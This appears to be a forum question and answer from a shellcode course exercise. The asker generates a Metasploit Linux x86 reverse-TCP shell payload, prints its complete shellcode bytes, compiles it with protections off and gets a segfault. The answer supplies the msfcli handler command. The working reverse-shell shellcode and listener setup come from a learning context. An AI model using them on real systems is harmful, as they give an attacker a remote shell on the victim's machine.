How to run the linux/x86/shell_reverse_tcp payload stand alone?

Question

I'm trying to run the linux/x86/shell_reverse_tcp payload. If I look at the summary of the payload it seems like a host and port are the two requirements, shown below.

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_reverse_tcp S

       Name: Linux Command Shell, Reverse TCP Inline
     Module: payload/linux/x86/shell_reverse_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 190
       Rank: Normal

Provided by:
  Ramon de C Valle <rcvalle@metasploit.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell

Because I'm running this on the local host I used ifconfig to find my local ip address. It seems to be 10.0.1.38, shown below

max@ubuntu-vm:~/SLAE/mod2$ ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:bf:ec:33  
          inet addr:10.0.1.38  Bcast:10.0.1.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:febf:ec33/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7866 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5066 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3043939 (3.0 MB)  TX bytes:1149171 (1.1 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:310 errors:0 dropped:0 overruns:0 frame:0
          TX packets:310 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:29143 (29.1 KB)  TX bytes:29143 (29.1 KB)

So I use the msfpayload command to output the shellcode, put it in my shellcode sand box, and compile

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload \
              -p linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 C
/*
 * linux/x86/shell_reverse_tcp - 68 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=10.0.1.38, LPORT=3333, 
 * ReverseConnectRetries=5, ReverseAllowProxy=false, 
 * PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x00\x01\x26\x68"
"\x02\x00\x0d\x05\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc \
              -fno-stack-protector -z execstack -o shellcode shellcode.c

So all seems well, except then when I try to run the payload I get a segmentation fault. So my question is how would I run this payload successfully?

max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  26
Segmentation fault (core dumped)
max@ubuntu-vm:~/SLAE/mod2$ 

Answer 1

It's a reverse_shell, it needs something to connect to.
You have to configure and create a reverse_handler, something like this:

# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 E